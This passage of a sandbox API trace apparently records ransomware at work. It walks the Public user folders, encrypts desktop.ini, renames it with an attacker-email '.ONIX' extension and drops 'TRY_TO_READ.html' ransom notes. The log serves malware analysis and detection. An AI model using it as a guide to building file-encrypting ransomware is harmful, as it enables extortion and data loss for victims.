hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.678] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.678] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.678] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.679] CloseHandle (hObject=0x470) returned 1 [0068.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4c18 | out: hHeap=0x410000) returned 1 [0068.679] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.679] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.679] GetLastError () returned 0xb7 [0068.679] CreateFileW (lpFileName="C:\\\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x470 [0068.679] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.679] LockFile (hFile=0x470, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xae, nNumberOfBytesToLockHigh=0x0) returned 1 [0068.679] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0068.679] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.679] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0068.679] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0068.680] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\desktop.ini", dwFileAttributes=0x80) returned 1 [0068.680] lstrlenW (lpString="C:\\\\Users\\Public\\desktop.ini") returned 28 [0068.680] GetProcessHeap () returned 0x410000 [0068.680] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa8) returned 0x43e3f8 [0068.680] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Users\\Public\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\desktop.ini") returned="C:\\\\Users\\Public\\desktop.ini" [0068.680] lstrcatW (in: lpString1="C:\\\\Users\\Public\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.680] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174) returned 1 [0068.680] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xae [0068.680] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0068.680] GetProcessHeap () returned 0x410000 [0068.680] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0068.680] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0068.680] WriteFile (in: hFile=0x470, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0068.685] WriteFile (in: hFile=0x470, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0068.686] WriteFile (in: hFile=0x470, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0068.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x473108 [0068.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x473050 [0068.687] SetFilePointer (in: hFile=0x470, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.687] ReadFile (in: hFile=0x470, lpBuffer=0x473108, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473108*, lpNumberOfBytesRead=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0068.687] SetFilePointer (in: hFile=0x470, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.687] WriteFile (in: hFile=0x470, lpBuffer=0x473050*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0068.688] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0068.688] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0068.688] UnlockFile (hFile=0x470, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xae, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0068.688] CloseHandle (hObject=0x470) returned 1 [0068.689] GetProcessHeap () returned 0x410000 [0068.689] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0068.689] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0068.691] GetProcessHeap () returned 0x410000 [0068.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0068.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0068.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4c18 | out: hHeap=0x410000) returned 1 [0068.691] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0068.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.691] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.691] GetLastError () returned 0x0 [0068.691] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.692] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.692] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.693] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.693] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.693] CloseHandle (hObject=0x470) returned 1 [0068.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4c60 | out: hHeap=0x410000) returned 1 [0068.693] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0068.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.694] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.694] GetLastError () returned 0xb7 [0068.694] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\downloads\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.694] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.694] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.695] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.695] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.695] CloseHandle (hObject=0x470) returned 1 [0068.695] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.695] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.695] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.695] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4ca8 | out: hHeap=0x410000) returned 1 [0068.695] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.695] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.695] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.695] GetLastError () returned 0x0 [0068.695] CreateFileW (lpFileName="C:\\\\Users\\Public\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.696] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.696] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.697] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.697] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.697] CloseHandle (hObject=0x470) returned 1 [0068.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.697] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4cf0 | out: hHeap=0x410000) returned 1 [0068.697] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0068.698] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.698] GetLastError () returned 0xb7 [0068.698] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\libraries\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.700] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.700] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.701] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.701] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.701] CloseHandle (hObject=0x470) returned 1 [0068.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.701] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4d38 | out: hHeap=0x410000) returned 1 [0068.702] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0068.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.702] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.702] GetLastError () returned 0x0 [0068.702] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.702] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b7f0 | out: hHeap=0x410000) returned 1 [0068.702] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.703] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.703] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.703] CloseHandle (hObject=0x470) returned 1 [0068.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0068.703] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0068.703] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.703] GetLastError () returned 0x0 [0068.703] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.704] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.704] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.705] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.705] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.705] CloseHandle (hObject=0x470) returned 1 [0068.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4d80 | out: hHeap=0x410000) returned 1 [0068.705] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0068.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.705] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.705] GetLastError () returned 0x0 [0068.705] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.706] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.706] WriteFile (in: hFile=0x470, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.708] WriteFile (in: hFile=0x470, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.708] WriteFile (in: hFile=0x470, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.708] CloseHandle (hObject=0x470) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4dc8 | out: hHeap=0x410000) returned 1 [0068.708] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30a531b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a531b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a79310, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0068.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.708] GetLastError () returned 0x0 